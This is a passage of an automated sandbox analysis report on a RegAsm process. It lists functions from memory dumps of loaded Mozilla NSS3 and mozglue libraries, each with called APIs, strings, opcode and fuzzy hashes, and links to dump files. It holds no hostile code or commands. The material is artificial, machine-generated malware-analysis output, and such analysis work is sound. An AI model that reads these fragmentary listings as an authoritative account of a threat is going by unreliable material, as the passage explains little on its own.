Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal$nl
API String ID: 332880674-1116290892
Opcode ID: 23ff2348b85ab1cd7a8296ee5e2aa781f5fe02b8d1bfffd8415f2cb163b53069
Instruction ID: 1e26e33fb124321940d920e6c22df1e1506481a2b102a5613c9a0e9bb2a1debe
Opcode Fuzzy Hash: 23ff2348b85ab1cd7a8296ee5e2aa781f5fe02b8d1bfffd8415f2cb163b53069
Instruction Fuzzy Hash: 69210D71700114DFDB109BA5ED88B5F3375EB5230DF545029E80EA7A21EB30DC49C6B2

Uniqueness

Uniqueness Score: -1.00%

Function 6CD8CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6CD8CD08
PK11_DoesMechanism.NSS3(?,?), ref: 6CD8CE16
PR_SetError.NSS3(00000000,00000000), ref: 6CD8D079

Part of subcall function 6CDEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CDEC2BF

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: 3c66f589084cc37295c911354d8f16dcd8fbe462e41f441ba3ac7555bcf63e67
Instruction ID: 0a16df60beca2a1f1380d04448b8bf48a443fb0af6a5f1bd7673822b018aecc0
Opcode Fuzzy Hash: 3c66f589084cc37295c911354d8f16dcd8fbe462e41f441ba3ac7555bcf63e67
Instruction Fuzzy Hash: 55C18EB1A01219DBDB20DF24CC80BDAB7B4BF48308F1442A9E948A7751E775EE95CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6CBD3E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 6CBD3EEE
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CBD3FDC
RtlAllocateHeap.NTDLL(?,00000000,00000040), ref: 6CBD4006
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CBD40A1
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6CBD3CCC), ref: 6CBD40AF
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6CBD3CCC), ref: 6CBD40C2
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CBD4134
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,?,?,?,?,6CBD3CCC), ref: 6CBD4143
RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,?,?,?,?,6CBD3CCC), ref: 6CBD4157

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Free$Heap$StringUnicode$Allocate
String ID:
API String ID: 3680524765-0
Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction ID: 349e2a77ab6740c9c46eef529c9e36d1e11b04a4b6aae4a8791e5e3a9a063f57
Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction Fuzzy Hash: 35A18FB6A00255CFDB40CF28C88065AB7B5FF48308F2645A9D909EF742D771E886CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CC19D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CC18273), ref: 6CC19D65
free.MOZGLUE(6CC18273,?), ref: 6CC19D7C
free.MOZGLUE(?,?), ref: 6CC19D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CC19E0F
free.MOZGLUE(6CC1946B,?,?), ref: 6CC19E24
free.MOZGLUE(?,?,?), ref: 6CC19E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CC19EC8
free.MOZGLUE(6CC1946B,?,?,?), ref: 6CC19EDF
free.MOZGLUE(?,?,?,?), ref: 6CC19EF5

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 7d556aa6f61806810eafc06cc48b313be9d340be728663e67644e5327bcfa6df
Instruction ID: 1c1a7badc2b4b7c83f7c048fe639eff73c38f3e1e59812abb20619b26e6feefe
Opcode Fuzzy Hash: 7d556aa6f61806810eafc06cc48b313be9d340be728663e67644e5327bcfa6df
Instruction Fuzzy Hash: 4E71AFB0909B818BD712CF19C48055BF3F4FF99715B44965DE89A9BB02EB30E889CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 6CD42C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(91FBCEEB), ref: 6CD42C5D

Part of subcall function 6CDA0D30: calloc.MOZGLUE ref: 6CDA0D50
Part of subcall function 6CDA0D30: TlsGetValue.KERNEL32 ref: 6CDA0D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6CD42C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CD42CE0

Part of subcall function 6CD42E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CD42CDA,?,00000000), ref: 6CD42E1E
Part of subcall function 6CD42E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CD42E33
Part of subcall function 6CD42E00: TlsGetValue.KERNEL32 ref: 6CD42E4E
Part of subcall function 6CD42E00: EnterCriticalSection.KERNEL32(?), ref: 6CD42E5E
Part of subcall function 6CD42E00: PL_HashTableLookup.NSS3(?), ref: 6CD42E71
Part of subcall function 6CD42E00: PL_HashTableRemove.NSS3(?), ref: 6CD42E84
Part of subcall function 6CD42E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CD42E96
Part of subcall function 6CD42E00: PR_Unlock.NSS3 ref: 6CD42EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CD42D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6CD42D30
CERT_MakeCANickname.NSS3(00000001), ref: 6CD42D3F
free.MOZGLUE(00000000), ref: 6CD42D73
CERT_DestroyCertificate.NSS3(?), ref: 6CD42DB8
free.MOZGLUE ref: 6CD42DC8

Part of subcall function 6CD43E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD43EC2
Part of subcall function 6CD43E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CD43ED6
Part of subcall function 6CD43E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CD43EEE
Part of subcall function 6CD43E60: PR_CallOnce.NSS3(6CEA2AA4,6CDA12D0), ref: 6CD43F02
Part of subcall function 6CD43E60: PL_FreeArenaPool.NSS3 ref: 6CD43F14
Part of subcall function 6CD43E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CD43F27

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: 2828582e501aad34ca5100e37a3502974c8748f2ac059abfc29b8b33b67267c6
Instruction ID: 5104206981330b1bf7ad78ce3b4d19651f1467d32da289a743b03948dd2d5fdc
Opcode Fuzzy Hash: 2828582e501aad34ca5100e37a3502974c8748f2ac059abfc29b8b33b67267c6
Instruction Fuzzy Hash: 4251CE71A04211DBDB019F29DC89B5B77E5EF8834CF148428EA95C3A60E731E8158BE2

Uniqueness

Uniqueness Score: -1.00%

Function 6CC1DDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6CC1DDCF

Part of subcall function 6CBFFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CBFFA4B

Part of subcall function 6CC190E0: free.MOZGLUE(?,00000000,?,?,6CC1DEDB), ref: 6CC190FF
Part of subcall function 6CC190E0: free.MOZGLUE(?,00000000,?,?,6CC1DEDB), ref: 6CC19108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC1DE0D
free.MOZGLUE(00000000), ref: 6CC1DE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC1DE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC1DEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC1DEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CC0DEFD,?,6CBD4A68), ref: 6CC1DF32

Part of subcall function 6CC1DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CC1DB86
Part of subcall function 6CC1DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CC1DC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CC0DEFD,?,6CBD4A68), ref: 6CC1DF65
free.MOZGLUE(?), ref: 6CC1DF80

Part of subcall function 6CBE5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CBE5EDB
Part of subcall function 6CBE5E90: memset.VCRUNTIME140(6CC27765,000000E5,55CCCCCC), ref: 6CBE5F27
Part of subcall function 6CBE5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CBE5FB2

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: e716ad82ff34f758ffd66578a1b92cbd1c8aa8ed967eb2926c1bec5e64a8c99f
Instruction ID: 58b3babddf330c57cf3a707606286de0d368ab45a114c7fbe01e2e0e06ee42ac
Opcode Fuzzy Hash: e716ad82ff34f758ffd66578a1b92cbd1c8aa8ed967eb2926c1bec5e64a8c99f
Instruction Fuzzy Hash: BD51F9726097009BD722DF1AC8802AE7372BF95349F95411DD81A53F00F731F91ADB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CC25D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6CC25C8C,?,6CBFE829), ref: 6CC25D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6CC25C8C,?,6CBFE829), ref: 6CC25D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6CC25C8C,?,6CBFE829), ref: 6CC25D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6CC25C8C,?,6CBFE829), ref: 6CC25D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6CC25C8C,?,6CBFE829), ref: 6CC25DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6CC25C8C,?,6CBFE829), ref: 6CC25DC9
std::_Facet_Register.LIBCPMT ref: 6CC25DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6CC25C8C,?,6CBFE829), ref: 6CC25E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6CC25C8C,?,6CBFE829), ref: 6CC25E45

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: 0cf288fae6d19a8d83a58a6edc9e6393a32c65aa04cbc1d12b6c88f18959de2d
Instruction ID: 6510c9a932ef9a741e2b8c1ba1950e9e0adde6573da5ec7b8585ebd0f11e295c
Opcode Fuzzy Hash: 0cf288fae6d19a8d83a58a6edc9e6393a32c65aa04cbc1d12b6c88f18959de2d
Instruction Fuzzy Hash: C24182707002059FCB00EF65C998AAE77B5EF89318F5480A8E50A97795EB39D805CF51

Uniqueness

Uniqueness Score: -1.00%

Function 6CBFCC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6CBC31A7), ref: 6CBFCDDD

Strings

<jemalloc>, xrefs: 6CBFCF9F, 6CBFCFB3
: (malloc) Error in VirtualFree(), xrefs: 6CBFCFA4, 6CBFCFB8

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: 264e39c0fabd2c1bdb4e53e9ebf1518fb7b84c1820e4269e797861ff3ccad158
Instruction ID: 7681fd8ee77f274601fc59efe918c977538702ac8d11deeb5f7454e5744431c2
Opcode Fuzzy Hash: 264e39c0fabd2c1bdb4e53e9ebf1518fb7b84c1820e4269e797861ff3ccad158
Instruction Fuzzy Hash: FF31C4307402455BFF20AF698C55BAE7B75EB41758F20C018F624ABBC0EB70E44A87A2

Uniqueness

Uniqueness Score: -1.00%

Function 6CDA4DF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6CDA536F,00000022,?,?,00000000,?), ref: 6CDA4E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6CDA4F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6CDA4F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6CDA4FAE
free.MOZGLUE(?), ref: 6CDA4FC8

Strings

%s=%s, xrefs: 6CDA4F89
%s=%c%s%c, xrefs: 6CDA4FA9

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s
API String ID: 2709355791-2032576422
Opcode ID: 3b4eb9efc3424689ac9dfb4b68530d4f0f6d5639936570037ec656d1b225c84e
Instruction ID: afb8a52b51b60557bc463b2b6e591cd39ffc430e2f9d8d802e6450eecbf31f9b
Opcode Fuzzy Hash: 3b4eb9efc3424689ac9dfb4b68530d4f0f6d5639936570037ec656d1b225c84e
Instruction Fuzzy Hash: 1E514961A05145CBEF01CBE9C4907FF7BF59F46308F28A126E890A7B61DB35DA0787A1

Uniqueness

Uniqueness Score: -1.00%

Function 6CBCECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6CBCF100: LoadLibraryW.KERNEL32(shell32,?,6CC3D020), ref: 6CBCF122
Part of subcall function 6CBCF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CBCF132

moz_xmalloc.MOZGLUE(00000012), ref: 6CBCED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CBCEDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6CBCEDCC
CreateFileW.KERNEL32 ref: 6CBCEE08
free.MOZGLUE(00000000), ref: 6CBCEE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CBCEE32

Part of subcall function 6CBCEB90: moz_xmalloc.MOZGLUE(00000104), ref: 6CBCEBB5
Part of subcall function 6CBCEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6CBFD7F3), ref: 6CBCEBC3
Part of subcall function 6CBCEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6CBFD7F3), ref: 6CBCEBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6CBCEDC1

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: bff5b2f5ae979bbd9f04bf5540562e5a6a32f9d387bff4ace754244ecdf96b8b
Instruction ID: 7695ae3b46ef2907fada0c3c9a47c8544de75c15d9b456765be4ca9e05317f1d
Opcode Fuzzy Hash: bff5b2f5ae979bbd9f04bf5540562e5a6a32f9d387bff4ace754244ecdf96b8b
Instruction Fuzzy Hash: 0851E171E052D9CBDB10DF68D8426EEB7B0EF49358F04852DE8556B740E730A988CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 6CE12F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE12FFD
sqlite3_initialize.NSS3 ref: 6CE13007
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CE13032
sqlite3_mprintf.NSS3(6CE7AAF9,?), ref: 6CE13073
sqlite3_free.NSS3(?), ref: 6CE130B3
sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6CE130C0

Strings

sqlite3_get_table() called with two or more incompatible queries, xrefs: 6CE130BB

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
String ID: sqlite3_get_table() called with two or more incompatible queries
API String ID: 750880481-4279182443
Opcode ID: 45dbcc0a753ea9cbb1c55cd02ad149257508dfdbe264455797c90826bafba3d6
Instruction ID: 78fa8aa9101d676784246731fa9de5dfe9eb8dcf2e0468fdb87a49fae76f64e8
Opcode Fuzzy Hash: 45dbcc0a753ea9cbb1c55cd02ad149257508dfdbe264455797c90826bafba3d6
Instruction Fuzzy Hash: 73419F71604A06AFDB00CF25D880A86B7F5FF58368F258628EC5987F40E771F9A5CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CC3A520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CC3A565

Part of subcall function 6CC3A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC3A4BE
Part of subcall function 6CC3A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CC3A4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6CC3A65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CC3A6B6

Strings

0, xrefs: 6CC3A5FB
z, xrefs: 6CC3A6AE

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: 80b5a86c7d797b8d2936c4e934821b928524b984b96f027f79f937f9e79aa7a2
Instruction ID: 26c175b2db670ab8eec0d5c89cf055e77355f4f69d978da6fcc29c80b1d93ecd
Opcode Fuzzy Hash: 80b5a86c7d797b8d2936c4e934821b928524b984b96f027f79f937f9e79aa7a2
Instruction Fuzzy Hash: 86413571A087459FC741DF28D080A8FBBF4BFC9344F409A2EE49987650EB30E659CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6CD58CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6CD6124D,00000001), ref: 6CD58D19
EnterCriticalSection.KERNEL32(?,?,?,?,6CD6124D,00000001), ref: 6CD58D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6CD6124D,00000001), ref: 6CD58D73
PR_Unlock.NSS3(?,?,?,?,?,6CD6124D,00000001), ref: 6CD58D8C

Part of subcall function 6CDEDD70: TlsGetValue.KERNEL32 ref: 6CDEDD8C
Part of subcall function 6CDEDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CDEDDB4

PR_Unlock.NSS3(?,?,?,?,?,6CD6124D,00000001), ref: 6CD58DBA

Strings

KRAM, xrefs: 6CD58CF9
KRAM, xrefs: 6CD58D3E

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

